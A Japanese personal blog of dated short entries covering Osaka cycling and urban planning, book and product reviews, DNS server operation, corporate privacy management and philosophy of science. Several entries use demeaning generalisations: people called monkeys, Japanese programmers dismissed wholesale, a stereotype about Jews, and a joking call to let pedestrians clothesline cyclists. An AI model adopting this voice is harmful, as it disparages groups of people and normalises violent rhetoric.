が見出された.その他の歩道通行理由として,経路の問題(遠回りの回避)や柵のため車道から移動できないことなどが指摘された.自転車利用者の諸特性の多様性の観点から受容度の高い自転車通行空間整備の対策について論じた.https://www.jstage.jst.go.jp/article/jscejipm/72/5/72_I_1217/_article/-char/ja/

2019-10-20下記の記事は5年前のものだが、それから5年が経過しても、大阪市内に住む者として言わせてもらえば、殆ど効果はない。なぜなら警察が取り締まっていないし広報もしてないからだ。車道を走る自転車なんて10台に1台もいれば良いほうだし、夜間に照明を点灯する自転車など、カートで走行する一団を見かけるよりも珍しいと言えるほどだ。そして、「歩道の暴君、車道の弱者」と言うけれど、横断歩道を渡ろうとする歩行者を無視して赤信号でも車道を走り歩行者の前を停止もせずに横切っていくというあからさまな違法行為を先に徹底して検挙するべきであり、程度問題でうやむやになるような事例を最初に語ってもらっても困る。とにかく、大阪は犯罪者(軽犯罪法、道路交通法も立派な法律であり、違反すれば形式的にはそう言える)が多すぎるのだ。警察が弱腰か放置しているなら、せめて歩行者には、一時停止せずに横切る自転車にウェスタン・ラリアットを食らわせるくらいの正当防衛を条例で認めたらどうか。遅刻しそうで急いでる? 二束三文企業の勤め人が5分ほど遅刻したくらいで、国家の GDP や財政に何の影響があるというのか。無謀な運転は撲滅すべきだが、対策を講じることで新たな危険を生み出すのは本末転倒。新たな自転車対策は期待された効果を発揮できるのだろうか。【関西の議論】規制強化される「歩道の暴君、車道の弱者」…“自転車王国・大阪”の憂鬱

2019-10-20理想を言えば、横断歩道など無い方がいいに決まっている。車道をアンダーパスにするか、それとも歩道を地下に潜らせるかはともかくとして(歩道橋は歩行者の負担が大きく、車道を横切る習慣がついてしまう人が多い)、交差しなければリスクは大幅に低減するし、そもそも両者が停止せずに走行・通行できるのだから効率も上がる。そのためには、そもそも設計として道路というものを歩行者の観点で設計し、その次に車両の合理的な走行に資するプランを立てるのが適正だろう。結局、これまでの行政なり都市計画が愚かだったのは、最初から道路というものを車両の走行場所として張り巡らせようとしたからであって、本来はビジネス街だろうと居住区だろうと《余計なもの》である車や自転車の観点でものごとを考えていたことに原因がある。

2019-10-20マリオ・リヴィオの本を勝手に数学の専門書だと思い込んで「羊頭狗肉」などと書かれてもなぁ。あんたが有名なサイエンス・ライターを知らないか、"How a Mathmatical Genius Discovered the Language of Symmetry" というサブタイトルのニュアンスを英語として読めてないだけの話じゃないのかね(専門書、たとえば Springer の本がこんなニュアンスのサブタイトルをつけるかな)。あと、それなりに歴史があってでかい出版社だけど、Simon & Schuster から数学の専門書が出るわけないのは洋書をよく読む人なら誰でも知ってることだ。妄想を根拠にあれこれ専門家ヅラして書いたところで滑稽なだけだ。表題が内容を表していない。表題は明らかに5次(以上の)方程式の意味だが、内容は「数学書」ではない。一言で言えば、「数学者と数学に関する話題を集めた読み物」であって、全体を通してのテーマは「対称性symmetry」である。著者がこの本で書きたかったことの一つは二人の若くして死亡した天才数学者ガロアとアーベルの伝記、そしてもう一つのテーマが「対称性」という言葉をキーとして、集めてきた随筆集ということである。https://www.amazon.co.jp/gp/customer-reviews/R1EIS6TXE24XQO/ref=cm_cr_dp_d_rvw_ttl?ie=UTF8&ASIN=0285637894

2019-10-20国交省の運営するサイトだという。若者が海外旅行しないという話題の記事だが、まぁ関心が多様化してるなんてことは誰でも言えるし、オンラインで検索すれば数日ていど観光して得るよりも多くの《情報》をページで読んだり動画で観たりできるので、それで十分だという人もいよう。でも、ウェブページや動画だけでは分からないこともある。たとえば、韓国や香港で、いかに英語が通じないか。香港でも英語が話せる人は少ない。タクシーの運転手なんて殆ど理解していなかったので、「ツィムスァーツォイ!」と地名を連呼するほかなかった。ソウルでも、滅茶苦茶な英語を喋ってるくせに "Ur English not good" とか言う学生や社会人だらけで、ああ韓国でも英語がちゃんと使えるのは官僚と芸能人と金融屋だけなんだなと思わされた。記事の中では最初に行く外国の土地として「ハワイ」が勧められてるけど、まぁ妥当なところだろう。かなり日本人が多いし日本人を相手にする商売も多いので、何か日本人に関連して事故や事件が起きると現地の経済が大打撃を受けるので、それなりに治安の維持にも力を入れているからだ。そういう上げ膳据え膳の旅行ができるところでもない限りは、はっきり言って日本人のガキなんて犯罪に巻き込まれるか、ヨーロッパなんかに行けば酷い差別に打ちのめされるだけだ。海外を訪れる若い人の数がなかなか増えていかないという。学生との交流機会の多い森下教授は、レジャーの多様化に一因があると指摘する。また、観光業界側のPRの発想が、時代のニーズに対応出来ていない点も指摘する。旅行会社や観光庁での勤務経験もあることから、多角的に若者の旅行について持論を展開してくれた。【前編】グローバル時代の「入り口」、それが旅(C森下) | グラスプ(Grasp) produced by 国土交通省

2019-10-20凄いなぁ。イオンド大学のサイトって、まだあったんだ。2008年くらいで更新が止まってるようだけど、日本の交通地理学を山口平四郎氏らとともに築いた清水馨八郎氏も「教授」だそうで、ディプロマなんかに手を出さなければ狭い分野でも後進から一定の尊敬を集めたであろうに、この清水さんは更に色々と馬鹿げた発言を繰り返しているという。ちなみに、もうこの手の連中を何か共通の思想をもつかのように「ネトウヨ」とか呼ぶのはよろしくないと思う。こんなのはネットだろうとなかろうと右翼とは何の関係もないバカか無知無教養なのであって、右翼を連想する呼称を使うのは故野村秋介氏のような人々に失礼だろう。http://www.iond-univ.org/index.html

2019-10-20au by KDDI からメールが来ていて、普段は無視するのだけれど、たまたま中を読むと2年縛りの更新をした記念に引換券を3,000 円ぶんくれるという。そして、利用期限が来月までとのことなので、せっかくだから使うことにした。ついでに、au が運営する「au Wallet Market」というサイトで使えるポイントに交換して、そこで商品を選ぶことにしたのであった。ただ、その EC サイトの商品は意外に種類が少なくて、3,000円ていどで買い物できる商品は限られていた。その中で、なんだかよく分からないがフィットネス用の物体らしきものを見つけて注文したのが、これだ。台風の影響があったからか、やや遅れて到着したのだが、いざ使ってみると意外に良かった。発泡スチロールよりも硬い材質だが痛くはない。マッサージ機器を使っている感覚に近い。EMSトレーニングだけでなく、筋肉トレーニングやストレッチ、そしてボディケアに至るまで。健やかで快適な身体づくりを追求するために、フィットネスのための新シリーズが誕生しました。あなたのトレーニング意識をさらなる高みに導く、機能性とデザイン性を兼ね備えたツールの数々。本格的かつスタイリッシュな「SIXPAD」ならではの世界観を受け継いだトレーニングツールが、より充実したトレーニングライフをサポートします。https://www.mtgec.jp/wellness/sixpad/products/bodypole/

2019-10-20昨日紹介したサイトなのだが、このフロント・ページの体裁をご覧いただくとお分かりのように、おおまかには MarkupDancing のフロント・ページと《建付け》は似ている。僕は、個人の《頭の中》という言い方でいいのかどうかはっきりしないが、個人の knowledgebase というものは、概念の相関としてこんな体裁のモデルが妥当なのだろうと思うんだよね。他人から見ると、よく分からないのだ。僕もかつて、MD のコンテンツは何がテーマなのか分からないと言われたことがあるけれど、それは僕個人が色々な目的や動機や関心をもつからだ。これは何も知性なり学歴なり年齢とは関係なく、幼稚園に通う子供にだって塾とか友達とかお菓子とかゲームとか家族とか国民健康保険とか、色々なカテゴリーで関心事に関わる情報とか自分なりの意見や身の処し方がまとまっている筈なのである。カテゴリーどうしの関りは、確かに他人にはよく分からない。鹿持雅澄と Kali Linux に何の関係があるのか。そんなもん、俺も知らんよ。だって、MarkupDancing というサイトは、そういう話題どうしの関係について何かを議論しているサイトではなく、そういう雑多なコンテンツを置く場所、つまりは河本孝之という個人の関心を集めて公表しているサイトだからだ。そして、そういう関心どうしに何か関りがあるのかどうかは、本人にもよく分からないことが多いのである。それに、本人が無理やり関連性を考えるのは自己催眠や自己正当化に陥りやすく、却って有害である。自分でも自分自身について分からないことがあるという開放性がある方が、面白いのだ。人は本質的に(自分自身についてすら)無知で有限な存在であることがよくわかるし、自戒にもなる。よって、サイトで示されてること《だけ》が当人の関心事の exhaustive な列挙や、個々の関心事についての総体ではないという、まだ公表されていない可能性についても色々と考えたり語りうる。ネットのコンテンツとは、しょせんそういうものだと弁える lesson にもなろう。http://www.wilsonmar.com/1likes.htm

2019-10-19昨日はジュンク堂の大阪本店で文庫本や雑誌のフロアにも立ち寄った。十二国記シリーズの新刊は既に購入したので、他の新書や文庫の新刊を眺めていたのだが、さほど食指の動くものがない。寧ろ中公文庫のケルト文化に関する上下巻の本が二種類も出ているのを知って、どちらも読みたいと思ったくらいしか感想がないのである。このところ早川文庫の NF レーベルは、自己啓発本か、ポピュラー・サイエンスの本でもかなり低レベルなものしか出ていないので、読む気がしない。新書も、特に講談社現代新書はページ数ばかり増える割にPHP新書のような通俗的なテーマが多く、ここ数年は買う機会が減った。ブルーバックスも二束三文の話題か、あるいは定期的にブームとなるらしい「大人の復習」をうたうような内容のものが増えて、殆ど買わなくなった。先端の話題は賞味期限が短いし、場合によっては絶版となるようなイカサマもあるわけだし、もっと手堅く工学系の基礎を扱うタイトルがほしい。ウェーブレットとか、トライボロジーとか、いくらでもトライする分野はある。あと、科学基礎論のタイトルがいつまでも村上さんの本だけというのも、理工系の啓蒙書のシリーズとしては恥ずかしい。科学の啓蒙と言っても、しょせんはイエロー・モンキーに道具を与えるだけのことかと笑われないレーベルにしたいのであれば、科学史や科学基礎論のまじめなタイトルも必要だ。ちなみに STS やフェミニズムの左翼ネタを扱えばいいと言っているわけではない。あと、講談社文芸文庫の新刊で柄谷行人氏と浅田彰氏の対談集なんて本が出ていたのだが、確かにそろそろこうした人々の事績を整理しておく必要もあるのだろうなぁ。ただ、いまの学生さんに知っておいてもらいたいのは、これらの「文壇」とか「ニューアカ」とか「ポストモダン」に関わった人々というのは、出版業界には貢献したけれど、はっきり言ってアカデミズムにおいては塵ほどの業績もない人たちだ。柄谷さんは熱病のように一時期は分析哲学の勉強をしたようだし、何冊かウィトゲンシュタインやクリプキに関する素人批評みたいな本を出していたが、プロパーで実際に読んでる人は殆どいないし、読む必要があるとも思えない。僕自身は大学へ入る前に、栗本慎一郎氏がマイケル・ポランニーやメルロ=ポンティを使って議論していた著作を熱心に読んでいたものだったけれど、やはり科学哲学の専門的な勉強を進めていくと、ああした著作は雑な議論であることが分かる。そういうものを「思想」と呼ぶこともあるわけだが、もちろんそれは僕の定義で言う思想とは違う代物だ。(思想というのは、多くの人が考えているような《アカデミックでない哲学》とか、《俗人の哲学的な思考》とか、そういうものではないと思う。)

2019-10-19昨日は帰宅する途中で堂島アヴァンザのデルタに立ち寄っていた。uni の Signo 307 の替え芯を買おうとして物色していると、この商品が目についた。uni は Sgino 307 でも変わったインクのボールペンを採用しているが、この『LIMEX』という商品もペン軸に石灰石を使ってプラスチックの代替を狙っているらしい。リリース情報のページには「SDGs」という言葉も見えるし、生産コストとして既存のペン軸を置き換えられるようになれば、こういう商品を《わざわざ》出すのではなく、既存の商品のペン軸も置き換えてしまえばいいだろう。https://www.mpuni.co.jp/news/pressrelease/detail/20190902105738.html

2019-10-19YouTube で見つけたのだが、8分とか20分とか細切れに8つの動画に分割されていて、しかもダウンロードできないと来てる。たぶん全くリテラシーのない学生か教員かセクレタリ(イギリスの大学では、また何かヘンテコな名詞で呼んでるんだろうけど)がアップロードしたんだろうなぁ。こういう、情報セキュリティの哲学や暗号論の科学哲学やインターネットの哲学とかやってる人に限って、実作業のスキルがぜんぜんないからね。デザインやプログラミングは僕らのように天性とか、それから一定の年月をかけた経験がないと難しいけれど、YouTube の UI 操作なんてそれこそ「デジタル・ネイティブ」とか呼ばれてるサルにでもできるタスクだからねぇ。"The History and Future of the Domain Name System," Oxford Internet Institute, University of Oxford, Aug 14, 2015.The History and Future of the Domain Name System, Part 1

2019-10-18歯科医院へ通うのにフレックス・タイム制度を使って16時に会社を退出することが多くなった。そのため、今週は毎日のように19時まで残業して「合計就労時間」に届くよう調整した。弊社は部長職であっても裁量労働制ではないため(特にバック・オフィス部門の部長は、会社として裁量労働制を採用していても例外で適用されない会社が多い)、一日8時間の就労に就労日数を掛けた合計就労時間というのが最低限の拘束時間として決まっている。したがって10月だと最低でも168時間と決まっているから、足りない時間数は残業か休日出勤で補うしかない。もちろん、この程度は別にブラックでもなんでもなかろう。裁量労働でないなら形式的にはバイトやパートやインターンと同じ計算方式なのだから、8時間×21日で計算して何が悪いのかということである。

2019-10-18曖昧なのは、臨床心理士のあなたがたの知識ではないのか。こんな明白な犯罪行為を、「いじめ」か「悪ふざけ」かと悩んでる時点で無知というものだと思うね。とにかく、常識的に考えてまともな行為じゃなければ警察に通報するものであって、こういうことを市民がやると「監視社会」になるとか言ってる左翼の学者なんてどうでもいいんだよ。口先だけでほんとうに世の中を良くしたいと思ってない、小説を書くか読書してるか、あるいはどこかの仮部屋で政治アピールの文書を読み上げてるだけの連中なんて社会科学的なスケールでは何の役にも立たん。人には曖昧さを嫌い避ける傾向があり、特にネガティブな事柄に対して、この傾向が強くなると言われている。いじめと悪ふざけ、パワハラと指導、虐待と躾。一つの事柄でも、被害者と加害者では捉え方が大きく異なり、これらの間には明らかに線引きできることもあれば、できないこともある。そのため、当事者同士の話が一致せず、目撃者の証言がバラバラになったりする。客観性に乏しいと感じれば尚更、曖昧な状況での判断には不安がつきまとい踏み込みにくくなる。神戸・教員いじめ 助長した2つの当事者心理を専門家が分析

2019-10-18相変わらず趣旨の分からない条件の契約で、機種変更する意欲が全く湧かない。そもそも、「端末返却」という言葉を何度も使ってるけど、僕らは分割払いで携帯端末を《購入している》のであって、au/KDDI から借りてるわけじゃねーよ。KDDIと沖縄セルラー電話は11月1日から、新しい端末購入補助プログラム「アップグレードプログラムNX」の提供を開始する。36回の分割払い(割賦)と端末返却を組み合わせたプログラムで、端末を返却すれば最大で12回分の分割金の支払いが免除される。プログラム利用料金は無料で、端末の購入時にのみ加入できる。https://www.itmedia.co.jp/mobile/articles/1910/16/news114.html

2019-10-18DNS 関連で古いページを見ていたら、こういうサイトがある。いい感じだ。それでも Windows 8 の話題を取り上げてるから、数年前までは更新していたということなので、ウェブ・コンテンツの《限界集落》というわけでもない。http://www.wilsonmar.com/1tcpaddr.htm

2019-10-18こういうのを見ても、国内の自然科学プロパーが書くものと比べて、"popular science" と言ってもレベルがぜんぜん違うということが分かるよね。たとえば科学哲学の論文を書くときに、日本の自然科学プロパーが書いた文章を epigraph として恥ずかしげもなく使えますかという話なんだよ。動的平衡とか、クオリアとか、小林行雄賞の数学とか・・・https://twitter.com/rmathematicus/status/1184931914941190150

2019-10-18この話とは関係ないけれど、科学哲学の概論を教養課程で授ける方々は、時代背景とかを正確に勉強してないなら、もう「科学哲学者でもあったアーサー・バークスは『コンピュータ』と結婚した」というネタは振らないように。Women’s Stories from the Computer Room - IMA

2019-10-18We can't have any responsibility for a hidden business. Incidents could be occurred because department heads hide their decision and facts from managers of security or information system. To make an effective governance, we need a power even to cut the neck of other managers. Tyrant may be the best management solution for the ruck, if you would want to keep being an average individual in such a group of deadheads.

2019-10-18前にも紹介した、科学哲学を専攻してから著述家となったレベッカ・ゴールドシュタインだ。面白い interview だとは思うけど、正直なところ 3:AM との違いが分からない。「哲学する」ということについて何か啓発的な内容があるというよりも、bibliography だよね。もしかして "What Is It Like to Be a Philosopher" という表現の意味しているところが理解できていないのであろうか(丁寧に説明しないと、例えば哲学科の学部生でも存在論的差異を理解できない人だって実際にいる)。恐らくはアメリカ人だろうから釈迦になんとやらかもしれないけれど、"a philosopher" という英語を取り違えていて、自意識とか自己分析と勘違いしてる可能性もあるなぁ。この表現は、哲学プロパーであることの社会的な意味ということを問うているわけではなく、ましてや「一人の哲学者」であることなんかどうでもいいんだよね。これらを本来の意味(回りくどい表現になるが、哲学するとか哲学する者として生きるということが、一定の知性を備えた生物なり存在にとってどういうことなのか)と取り違えてるなら、恐らくこの表現の元ネタであるネイグルの論文も正しく読めてないということになる。あれも、単にコウモリに感情移入する話みたいな馬鹿な解釈で説明する人がいて困るんだよね。http://www.whatisitliketobeaphilosopher.com/#/rebecca-goldstein/

2019-10-18何万のフォロワーがいる Go とか Ruby のメンテナーのツイートを見てると、たまに下らない発言があって萎える。やっぱり、君らはコーディングだけして GitHub とかでプレゼンスを維持してる方がいいよ。技術的に一定の成果を上げてる人が日本にもたくさんいるのは知ってて、ふだんは日本のプログラマなんて離散数学も知らないバカしかいないみたいに言ってるけど、そんなことはない。でも、それなりにできる人の中に割と人として情けないことを Twitter で書いてるのが意外とたくさんいるんだよね。特定の国を連呼して挑発的なこと書いてる馬鹿が大阪にもいるようだけど。流行の新しい言語のメンテナーとかに限って。あれは何なんだろうね。

2019-10-18どうも CPO である俺を素通りして、個人情報にかかわる新しいキャンペーンだとか情報の取り回しとか広告代理店との共同利用とか、そういう仕組みを始めたいという人が多いんだよね。役員ではないが事実上の「ファウンダー」だからといって何を怖がってるのかしらんが、これは全国の実務家を代表して言っておくけど、僕ら個人情報保護のマネジメント担当者は、個人情報を取得するなとか利用するなとか、そんなことを言ってるわけではなく、何も考えずに他人のことを聞いて無造作に扱うなと言ってるだけにすぎない。それ、人として最低限のことだよね。例えば知り合いの親が死んだことを誰かから聞いて、電車の中で「お父さんが電車に飛び込んで死んだらしいわ、借金が2,000万あったとかで」とか、ふつう口に出すか? 登録ユーザの ID を他の事業者に無断で API 経由で通知するとか、それ携帯ショップの社員が客の暗証番号をメモってるのと同じだろ。いくら哲学者だと言ってても、なんだかんで言って会社の部長なんだから金儲けを否定するようなこと言うわけないんであって、やるならやるでいいけど、ちゃんとやれと言ってるだけなんだよ。で、たぶんいちおうは考えて、そして考えると面倒だから素通りしようとするんだな。だから、何も考えてないよりはマシというていどには教育や啓発の効果は出てるわけだけど、まだまだだ。来月の審査が終われば、JIPDEC から貢献企業として表彰されるていどの年数は PMS を運用しているわけだけど、やはり社内の有能な人材が適正に運用できてるだけではだめで、この手のことはシステム開発やデザインにも言えるけど、トリクルダウンというのはありえない。僕らのような PMS の実務家と社員(その多くは役職者なのだが)の格差が開くだけだと、表面的には上場企業をしのぐ規程や技術を実装していても、実態は天満や堺筋本町あたりの場末のデザイン事務所と変わらないということになる。

2019-10-18勘違いしてる人が多いんだけど、個人情報やプライバシーの保護が重要なのは、手順や体制を適正に維持しないと誰かの権利が(特に知らないあいだに)侵害されるかもしれないからであって、しょーもない事実がそれだけで重要だからじゃない。仮に、或る苗字が特定の地域では在日外国人によくある苗字だとか言われるときに、本名がそういう苗字の人であるということは、それだけで不当な差別を受ける可能性があるため、理想としては本名を名乗ったくらいで差別なんかされない社会がいいのだけれど、そういう社会になるまでのあいだは差別されることを受忍するなんて理屈は成り立たないので、何らかの権利侵害を被る可能性があれば現状では保護する必要がある。苗字が何々という事実だけで本名というデータを保護する価値があるという話をしているわけではないのだ。よって、そういうリスクに比べたら、チンコの大きさが何センチとか、そんなプライバシーが漏洩するリスクなんて屁みたいなもんだという比較だってありうる。

2019-10-18やはり幅を rem で取ると安定しないな。出版年度のブロック要素を flex で並べたときに、"2011" と 2008" の幅が微妙に異なるため、並んでいる他の要素の「ツラ」が合わない。結局、rem って body で定義された幅との相対的な係数を参照しているだけであって、body で定義された《"m" のフォント・サイズ》を基準にしているわけではないということか。となると、まぁブロック要素の幅を相対値でちゃんと固定したい場合は、基準になるブロック要素を文字ではなく、正確な値で定義された上位のブロック要素とするしかないのか。となると、幅をピクセルで定義するのはいまどきちょっと躊躇するので、百分率しかないような気がするな。でも、百分率だと直前の親要素しか参照しないので、常にカスケードを意識してないといけなくなる。

2019-10-18実は、さきほど初めて Boing Boing の記事を読んだ。サイトは随分と前から知ってるんだけど、記事には興味なかったんだよね。初めて読んだのは、大学院生が学位論文の審査(日本では全く使われない言い方だが、アメリカでは dissertation を defend すると言う)で、たぶん学術誌に論文を投稿したときの rejection letters だろうけど、それを使って作ったスカートを履いて望んだという話題だった。

2019-10-18簡単に言って、分析哲学の範囲だと記号論理というシンタクスにしか興味がない人もいるので、前件が偽であるかどうかに興味がある科学哲学のプロパーとは違って矛盾した推論をしていても気が付かないんだろうな。と、ひとまず煽ってみたけれど、もちろん哲学者であるわれわれのような者にとって、自分が《科学哲学をやっている》かどうかとか、自分が《科学哲学者》であるかどうかなんて、実際のところどうでもよい。僕がたまに「分析哲学」を揶揄するのは、その歴史的な経緯や一定の業績を否定したいからではなく、そこに安住したまま piecemeal work を続けている人が多いからだ。「分析哲学」などと呼ばれるべき何らかの哲学的な体系だとか方法論、あるいは目標のようなものが存在しない(つまり社会学的な《現象》や《所作の伝統》である)というのは、そろそろ哲学史の常識になりつつあるのだし、まじめに言語分析や理想言語の提案などを志すならともかく、ゾンビやタコや雷男やドーナツの与太話を続けるだけなら、もうそんな旗を掲げる必要はなかろう。共通のテーマや SF 話について語り合っているから同じ哲学をやっているなどと考えるのは、錯覚である。

2019-10-18ちなみに老眼について検索すると、すぐに老眼を「改善する」とか「治る」というフレーズが目に付く。胡散臭いセミナー起業家だけでなく、一部の医療者も手術やトレーニングで老眼が治ると主張しており、無知なジャーナリストなどはすぐに「直る派と直らない派の対立がある」などと無責任な両論併記で《イカサマ中立》を描くのだが、たいていの一般的な医療情報サイトでは "There’s no cure for presbyopia. But there are a lot of ways to improve it" と説明しているし、多くの論文でも "Although it can’t be reversed, it is easy to correct" と書いている。もちろん、老眼を改善したり、あるいは単なる老化現象としての老眼ではなくスマートフォンの使い過ぎなどで起きる視覚のトラブルと言うべき現象を低減させるために、何らかのトレーニングが有効かもしれないし、もともとスマートフォンやパソコンのモニターはサルのように眺め続けるべきでもない。それゆえ、トレーニングと称するアドバイスを参考にするのも一つのアイデアだとは思う。だが、たとえばブルーベリーの錠剤を呑むと言った偽科学に手を出してサプリメントのような《おやつ》を食べ続けるのは、はっきり言ってお金の浪費でしかない。そういえば、三浦俊彦さんみたいな人物でもサプリメントが大好きらしいね。何のために哲学や論理学の勉強をしてきたんだろうなぁ。

2019-10-18ここ最近、トイレに入る時の御供に本を持ち込んでも、老眼鏡がないと字が読めなくなっている。おおよそ 30cm ほど離れたら何でもクリアに見えているが(視力は落ちたけれど遠方もかろうじて数十メートル先までは焦点が合うので、遠くを見るときは視力が落ちても気にならない)、だいたい自分の手が届く範囲よりも手前の物に焦点が合わないのは、近くに寄せても見えないという強い違和感を伴うと同時に、はっきり言って面倒臭い。遠くの物を見えるように何とかするなんて誰も考えないが、近くの物は近くへ引き寄せたり目を凝らしたりして眺めてきたのが、そんなことをしても無駄になったからだ。もちろん、それゆえ自宅では老眼鏡をかけたまま過ごすことが多くなり、実際は近くが常に見えなくなったという不便はないのだが、何かの事情で老眼鏡をかけていないと困惑することがある。しかも更に困るのは、老眼鏡をかけると遠くが全く見えなくなるので、老眼鏡をかけたままでもいられないということだ。その点、僕が自宅で使っている父親から譲り受けた老眼鏡は、遠くを見ても大丈夫な造りのレンズを使っているらしく、自分でわざわざ作った老眼鏡よりも高性能だ。まぁ、何のことはない「遠近両用メガネ」のことなのだが、老眼になったらどうしても安い単焦点の老眼鏡を買ってしまうので、やはり遠くが見えているあいだは遠近両用を使うのがいいかもしれない。

2019-10-18「歩行論ノート」でも取り上げた渡辺橋の南詰めにある横断歩道は、先を急ぐときに信号が青だと渡ってしまうことがある。もちろん、左折してくる車両は目の前に交番があろうと一時停止など殆どしないので危険であることは違いないが、場合によっては車が途切れることもあるため、チャンスと見て渡ってしまう。だた、実は渡辺橋の横断歩道は問題なく渡れたとしても、すぐ後に次のチャレンジが起きる。それは、南下してくる大量の通勤歩行者を避けて橋の欄干側へ抜けなくてはならないからだ。繰り返すが日本人は左側通行するのが(法律で決まっていなくても)常識なので、ここでも大阪駅や新地駅から降りて歩いてきた多くの人々が、いまをときめく関西電力や、数年前にときめいていた電通、そしてわずか昔に情報漏洩でときめいた野村総研といった会社へ橋の歩道の左側を大挙して出勤していく(中には自分たちが多勢であるからか、左側通行もくそもなく自分の歩きたいところを歩く《民主主義者》もいるわけだが)。そういう大勢の人々を避けて反対側へ抜けるのが、やや難しい。今日も抜けようとして、申し訳なく気の毒なことに真っ青なスーツを着た若者の靴を踏んで脱がしてしまった。なので、こういう難しさが複合している場所であるから、できる限り渡辺橋の南詰めは東西に横断しないよう心掛けたい。くだらない拘りで、つい急いでしまうのだが、当社は既にフレックス・タイム制度なので出社は9時でなくてもいいし、だいたい役職が「定時」などという概念に縛られるのも変だ(とはいえ、当社は部長級でも裁量労働制ではなく給与には見做し残業手当がつくし休日に研修をすれば代休がもらえる)。9時前に出社して打刻しないと違和感があるのは確かだが、昭和の雑魚サラリーマンみたいな感覚を引きずるのも良くないし無意味だし、このように危険でもありうる。

2019-10-17昨年の記事を穿り返してツイートしていたのを見たのだが、こういうのも科学史の話題として面白い。新生児学の確立に貢献したのは、もぐりの医者だったという話で、彼を取り上げた本も出ているようだ。Fake doctor saved thousands of infants and changed medical history

2019-10-17ふだんは Creative Cloud Desktop を起動して使うことはないため、何週間ぶりかで起動すると UI が変わっていた。これまではポケット手帳のようだと思っていたのだが、ちゃんとまともなデスクトップ・アプリケーションの体裁になったようだ。

2019-10-17僕もおおむね賛成だ。日本のコーダやプログラマの大半が三流大学の文学部を出たような人々ばかりで、インドや中国のように CS 学科の学部どころか修士が多くを占めているような現状と比べて、日本の技術者に数学やソフトウェア・エンジニアリングの素質が著しく欠落していることは、疑いようのない事実である。そして、それゆえに日本の技術系のブログ記事が非常に低レベルな小学生の自由研究みたいな内容であることは、僕がわざわざ何度も紹介しなくても検索さえしたことがあれば、誰でも分かるはずだ。よって、そういうレベルにあるまましょーもない記事ばかりを量産するのはよした方がいいと言いたい。しかし、彼らのような《産業の部品》は常に必要であるし、労働力の流動性が低い日本においては IT やネット・ベンチャーの業界がどうこうできる範囲を超えた問題があると思う。そういうわけで、記事の著者が勧めているように、僕が書いた validation のクラス・ファイルは当社のコーダどころか提携会社のプログラマも勝手に使いまわしているような状態が続いていて、ネタ元としては可能な限り品質を向上させていくようにしている。既に何社かで複製が出回っているらしいので書いておくが、PHP ファイルの冒頭に「時々京の方向に幅が細くて美しい線が入った飾りを持つ雀が往く」とか「男は傷の拳で美しく印刷された一冊の書を持ち憎い相手の笑いに応じた」などとエンコーディング判定用の文字列がコメントとして書いてあるのは、もともと僕が書いたコードだ。ただし、サーバの FW や IDS や .htaccess の mod_rewrite のルールと組み合わせた方が効果的であるということくらいは、「フルスタック」などと言われるていどの人なら知っているだろう。どこの馬の骨かわからない(=ライセンス的に問題があるかも知れない)、品質がどうなのか、性能がどうなのか… というような訳のわからないコードをコピペさせるのではなくて、「弊社推奨」とか「○○プロジェクト謹製」とかというような、素性がわかったものを使い、その品質を担保する。そういった方向の考え方が必要なのだ。http://www.nurs.or.jp/~ogochan/essay/archives/5476#more-5476

2019-10-172000年代の初め頃に建てたと思われるサーバで雑多なコンテンツをホストしていたらしいが、現在はその多くが中身の消失したゴースト・タウンとなっている。一部に、MODx を使ったサイトらしきものと、下の階層で現在も運用が続いているブログをもつ技術者とか、イラストやリンク集を掲載するサイトが残っているだけだ。http://www.nurs.or.jp/top.html

2019-10-17何言ってんだよ。ただの逆張り芸か、元博報堂の三文ライターとして「ネタ」がなくなると困るだけだろう。1/4 くらい、関係ないカネやんの話ばかり書いてるのも、無理くり記事を書いた証拠だ。「ワシの球速は180km」400勝投手の金田正一さんにあっぱれ

2019-10-17USEN さんから弊社のドメインについて権威を委譲してもらった DNS サーバを nsd で運用している。当社の固定 global IP アドレスを振ってあるルータ(YAMAHA RTX3500)の逆引きが正しくできないと困るケースがあり、USEN と契約を続ける限りは、この IP アドレスについて自由に取り回しできる方が何かと都合がいいからでもある。NSD は、もちろん「浸透いうな」でお馴染みの鈴木常彦さんのサイトでも、BIND よりはいいとお勧めされているからだ。とは言え、下記のユーザ会のサイトを見ると2014年あたりで運営が停止しており、Google Group も存在しないとエラーが返ってくる。やってる活動が翻訳というだけだと、やはり活発に何かを続けるというわけにはいかないので、こうなってしまうのも分かる。かといって、DNS 全般の議論に鈴木さんのようにコミットしていくと、これまた個々の参加者にとっては負担になる。ウィキペディアでは辛うじて(それでも最新版じゃないが)新しいリリースまでフォロー・アップされているようだが、やはり依然として BIND ユーザの方が多いということだろうか。NSD の利点として、逆に BIND には脆弱性が多いという話がよくあるのだけれど、NSD のページが古いと「それ、最新版の BIND にも通用するの?」と思われてしまうのは当然だ。ただ、日本語コンテンツのインデックスが弱いと言われる DDG で検索してすら、英語のページよりも日本語のページの方が NSD について詳しく説明しているページは多いという印象を受ける。逆に英語のページは大半が DNS 全般の説明に DNS サーバとして NSD や BIND の名前を出してるだけというページがたくさん上位に来ていて、意外と英語圏は DNS そのものが大して厳密に運用されていないか、運用する人も少ないんだろうなぁと思わせられる。https://unbound.jp/

2019-10-17街の中心部まで車が入ってくるからこそ、無駄な渋滞が起きる。大阪のように環状線や環状高速が十分に機能しているとは言えない状況だと、中心街から車を追い出すために都市計画という行政の施策に期待するのが難しいければ、現在のようにテナント・ビルをどんどん壊してホテルやマンション、あるいは幹線道路を公園に置き換えていくような趨勢に任せるしかないのだろうか。でも、だからといって車が無くなるかというと、僕は大阪の場合は非常に怪しいと思う。Spain's Happy Little Carless City - Reasons to be Cheerful

2019-10-17冒頭部分を読み始めたときは、アマゾンの事業拡大を揶揄してハレディーム(ハシド派)のような汎神論ないしは普遍主義の話を言っているのかと思ったら、そのまんまユダヤ教の信者の話をしていたのか。敬虔主義の生活習慣すら変容させるアマゾン、というか要するに金の話にすぎないと思うけど。こういうことは、昔からユダヤ人につきもののステレオタイプではあるけれど、彼らに限った話ではない。人種や宗教とは関係ないからこそ、EU などから恐らくアマゾンを始めとする GAFAM の影響力は看過しがたいと見做されているのだろう。https://www.nytimes.com/2019/10/16/nyregion/hasidic-jews-amazon.html

